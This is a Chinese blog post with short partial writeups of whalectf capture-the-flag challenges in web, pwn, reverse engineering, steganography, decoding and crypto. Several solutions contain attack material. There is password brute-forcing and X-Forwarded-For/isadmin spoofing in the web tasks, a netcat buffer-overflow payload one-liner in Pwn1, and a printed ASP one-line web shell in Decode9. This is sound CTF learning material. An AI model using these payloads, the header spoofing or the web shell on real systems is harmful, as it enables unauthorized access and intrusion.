whalectf 部分writeup

最新推荐文章于 2024-06-02 09:42:31 发布
最新推荐文章于 2024-06-02 09:42:31 发布
阅读量3.2k 收藏
点赞数
分类专栏: CrackMe 文章标签: whalectf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hujiuding/article/details/80158674
版权

Web

Find me 右键查看源码flag:{This_is_s0_simpl3}

密码泄露
http://39.107.92.230/web/web5/password.txt发现密码字典
爆破发现长度不一样的密码:Nsf0cuS
源码中截断了5位,修改请求包,将密码改为Nsf0cuS,返回这里没有flag字样
发现cookies:newpage=MjkwYmNhNzBjN2RhZTkzZGI2NjQ0ZmEwMGI5ZdgzYjkucGhw
Base64解290bca70c7dae93db6644fa00b9d83b9.php
进入为留言板,然后这里写图片描述

本地登录 抓包 添加X-Forwarded-For: 127.0.0.1,isadmin改为1
flag:{Why_ar3_y0u_s0_dia0}

http这里写图片描述

Pwn1
脚本:cat <(python -c “print ‘\x11’*40+’\x34\x12\xcd\xab’”) - | nc bamboofox.cs.nctu.edu.tw 22001
这里写图片描述
参考:http://www.secist.com/archives/3619.html
https://blog.csdn.net/CJ_Kano/article/details/42404985
这里写图片描述

R100
Python脚本
这里写图片描述
Password为Code_Talkers,但是提交不对、

Re 逆向练习
OD调试KEY{e2s6ry3r5s8f6 共17位,
单步调试
再打开IDA发现后几位未1024}
Flag为KEY{e2s6ry3r5s8f61024}

后面的比较简单,没上传图,觉得麻烦,需要就看下,不需要就算了,还有很多难点的没做出来———有空继续
Re
1. PE格式
PETool打开
块数目 0x0004
时间戳 0x591D5CCC
入口地址 0x0005B789
便是 0x0103
组合下
BJWXB_CTF{0004h-591D5CCCh-0005B789h-0103h}
2.Re warmup100 简单的异或

调试后发现是异或

算出BJWXB_CTF{W4rm_UP_warm_up_WARM_UP!}

  1. Re100 app-release 拖入jeb 发现是byte异或
    print(enc(“PXEJPMQFTiS|v\"#vMDwKMA3_b~w3o”, 18))
    计算BJWXB_CTF{Andr01d_VerY_S!Mple!}

Android1:

Jeb打开发现,byte[]=aHR0cDovLzQ1LjMyLjQ3Ljk4
,base64解码得http://45.32.47.98,,flag为ip

Android05
enc(jeb打开一串字符串,15) #异或

android09

找到该方法,gevalue()反回值是20000,符合要求,所以只需修改判断处得标识,使执行,修改11,flag{11}

杂项
流量分析100

Tcp流追踪下载原始数据
得到 ,winhex打开doc发现key
key{23ac600a11eaffc8}
decode 3
JavaScript 代码转换,直接将其在控制台执行得flag=itisjavascriptenjoy%21
其中%21=!

Decode8
flag{Just_4_fun_0.0}
https://www.cnblogs.com/zqh20145320/p/5710072.html
ascii表得整体凯撒移动

Decode9
Flag{? enusCtf }
参见https://blog.csdn.net/lanvnal/article/details/54635612
控制台运行得到:┼攠數畣整爠煥敵瑳∨?湥獵瑃≦┩
把上面这串复制到记事本,另存为,编码选上“Unicode”,关闭。用WinHex等可以查看16进制的软件,直接打开,一目了然。如果想显示正常,把开头的FF FE两个字节删了,再用记事本打开就看到了。木马为 <% execute request(“? enusCtf”)%

隐写
Find 50
拖入stegSolve,发现二维码层,扫描即可得

被我吃了50
Binwalk一看,修改后缀为.zip,解压即可得flag.txt

 合体鲸鱼
Frame browser

亚种50
Winhex直接打开flag{firsttry}

下雨天50 上工具StegSolve,好几个都是直接这工具就出来了、、、

愤怒得小猪100
扫码

真是动态图100
修改头格式,将9a改为GIF89a,打开是动态图,stegsolve分层看是base64编码,
组合为
Y2F0Y2hfdGh1X2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU=
解压catch_thu_dynamic_flag_is_qumte_simple,提交不对
改下key{catch_the_dynamic_flag_is_quite_simple},Ok!

密码学
德军密码(二进制密码)
KEY{YAHKR} 小写输入不对,不知道为啥

密钥生成
上脚本
d= 125631357777427553
rsa破解
通过公钥解密
openssl rsa -pubin -text -modulus -in warmup -in public.pem
得到n= 0xA41006DEFD378B7395B4E2EB1EC9BF56A61CD9C3B5A0A73528521EEB2FB817A7、
E= 65537 (0x10001)

勇敢的鑫9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2023 强网杯 Writeup
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
古典加密writeup
01-05
做CTF时遇到的古典加密的问题,自己写的writeup,信息安全专业的
关于信息实验开放实验第一天的gif隐写题
weixin_43593174的博客
04-29 455
打开GIF文件发现文件已经损坏 用010 Editor打开文件 和GIF的格式对比,发现头文件缺失“GIF8” 用010 Editor来补全文件头,得到一个闪动的密码 由于速度太快,采用Nomad GIF来进行分析,可得每一帧画面 图像有所重叠,可以用NomaGIF中的编辑板来改变背景颜色 单击背景的字母 点击更改颜色 将其改为随机另一种颜色,结果为 对每一帧实行相同操作,并且读...
CTFer成长计划训练营第二期挑战赛
七堇年的博客
10-01 750
CTFer成长计划训练营第二期挑战赛 1. 签到题 解压后发现二维码,微信扫码 flag{China_happy_birthday} 2. 刑天的烦恼 发现文件受损,因此我们需要去修复文件:这对我们对于图片的文件结构要有了解。找到gif的文件格式,然后对照 这个破损的文件。Gif的图片格式文档可以查看这个链接:发现文件受损,因此我们需要去修复文件:这对我们对于图片的文件结构要有了解。找到gif的文件格式,用010 Editor打开后对照会发现头部缺少:GIF8,进行补充47494638 ps打开,发现P
探索解谜之旅:CTF-write-ups 全面解析
最新发布
gitblog_00068的博客
06-02 299
探索解谜之旅:CTF-write-ups 全面解析 项目地址:https://gitcode.com/pcw109550/write-up 如果你对信息安全挑战赛(Capture The Flag,简称CTF)中的加密和区块链问题有浓厚兴趣,那么这个开源项目——CTF write-ups 将是你不容错过的宝藏。这里详尽记录了一系列由作者亲身参与并解决的难题,涉及多种尖端技术和算法应用。 项目介绍 ...
iscc 2014 writeup(图片处理题)
Ee1s
08-02 3002
广纳谏言
CTFer训练营第二期(国庆)挑战赛 WP
小元砸的博客
10-01 315
1. 签到 直接扫码得结果 2. 刑天的烦恼 补上文件头 逐帧分析网址:https://tu.sioe.cn/gj/fenjie/ 可得到Y2F0Y2hfdGhlX2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU= Base64解密得catch_the_dynamic_flag_is_qumte_simple 3. Boom 第一步: 解出得 第二步 解出得:x=74 y=68 z=31 第三步 解出得:x1=89127561 x2=-89127561 大胆的猜测是f
ISCC2014 writeup
热门推荐
奋斗、
09-12 3万+
算上今年4月份的360 Hackergame通关战,这是我第二次参加CTF比赛,现将比赛过程的一些思路和想法记录下来,同时也感谢诸多大神的指教。 0x01 Basic孙子教学 兵者诡道 第一关没啥好说的,F12一下,在response header里能找到Key Flag:Welcome-to-ISCC 知己知彼 45对应ASCII“
WriteUp模板1
08-08
WriteUp 模板1 的部分内容部分主要包括解题报告的主要内容,例如 nc - Pwn 解题方法描述、shiftF12 - Reverse 解题方法描述等。部分内容部分的主要目的是让读者了解当前解题报告的详细内容和解题思路。 编写要求 ...
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
XDCTF2014部分官方Writeup.doc
09-30
在访问特定的URL后,可以看到一个新的Python文件newapp.py的部分内容。关键在于,通过编写简单的爬虫或者使用Burp Suite工具,收集所有可能的文件内容。在这个过程中,找到了一个名为xdctf的函数,当特定条件满足时...
ISCC2014--basic+web+misc
w4y2'blog
06-15 3464
之前也没做过这一部分的题,但觉得这些题挺有意思的,比赛时间又长,就边学边做,也学到不少东西。   Basic 兵者诡道 进入关卡后 一番胡乱猜测后就没着了,大牛提示用GET,但是web小白没玩过抓包啊,学习一番,用WinsockExpert 得到了Key:Welcome-to-ISCC     知己知彼 只有两种字符,首先就猜测是摩尔密码,翻译为7个字符“m
蓝鲸CTF——隐写术
weixin_34268753的博客
08-12 1293
这一次我主要是打算把蓝鲸CTF里面的有关于隐写术的题目进行一下整合,让各位能够更好的查看 如有错误,希望各位大佬指点,谢谢!!! 1:Find 50 Find the hidden information (we call itflag) in theimage. HCTF 2014 Quals 解题思路:这一题难度易: 首先:下载这个图...
隐写术总结
ncafei的博客
01-28 3229
http://bobao.360.cn/learning/detail/243.html 2015-02-11 12:27:03 来源: AppLeU0@乌云知识库 作者:安全客  阅读:66527次 点赞(4) 收藏(33) 0x00 前言 之前还没有见到drops上有关于隐写术的总结,我之前对于隐写术比较有兴趣,感觉隐写术比较的好玩。
图片隐写(一)-GIF
weixin_51706044的博客
03-15 6282
文章目录GIF GIF 隐写术在CTF中出现时,常常会和加解密结合起来一起出现,或者是一些编码方式一起出现,以提高题目的难度 iscc2014中有一个题目,给了一个名为此为gif图片.gif的文件,接下来以本题进行解析: 打开图片之后: 发现文件受损,因此我们需要去修复文件:这对我们对于图片的文件结构要有了解。找到gif的文件格式,然后对照 这个破损的文件。Gif的图片格式文档可以查看这个链接:http://dev.gameres.com/Program/Visual/Other /GIFDoc.htm 用
GIF隐写
KakeruJ的博客
04-28 3849
CTF DAY1的倒数第二题: 首先 打开图片 发现打不开 用010 Editor 发现图片开头少了文件头 添加文件头 使得图片能够看到 这时候打开图片 发现 密码一闪而过 这时候 用到另一个软件 Namo_Gif 打开刚刚已经恢复好的GIF 可以清楚的看到每一帧 对于每一帧 修改他的第254bit色位,将他们都改成同一颜色 如黄色 此处省略… 拼接起来最后得到了 {Y2F0Y2hfd...
第一次写writeup
weixin_43896279的博客
07-04 3285
My WriteUp 题目:http://ctf5.shiyanbar.com/DUTCTF/1.html (第一次写writeup。。。嗯都懂) 思路:点进去发现真的是what a fuck! 感觉是一堆乱码 后来仔细看了看发现里面主要出现【】()+!符号,然后百度了一下,这叫jsfuck编码然后一大堆看了一下,没看懂,只明白一个大体意思就是可以对代码加密和防注入然后百度了一下解密 找了...
隐写术的相关解法
weixin_30950237的博客
11-20 416
利用wenhex打开,在文件尾部找到flag,key 等关键字,即可找到密码,但有时却打不开,需要密码,此时可以尝试再次修复压缩文件打开隐藏的文件 利用winhex打开,在文件尾部找到.txt ,即图片隐藏了某一文件,利用命令提示符,输入copy .jpg .rar形成新的压缩文件,打开文件即可找到隐藏的文件。 利用winhex打开,查看文件头,发现文件头缺失,补全缺失部分,再分析解答。 Y...
iscc2015官方writeup
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值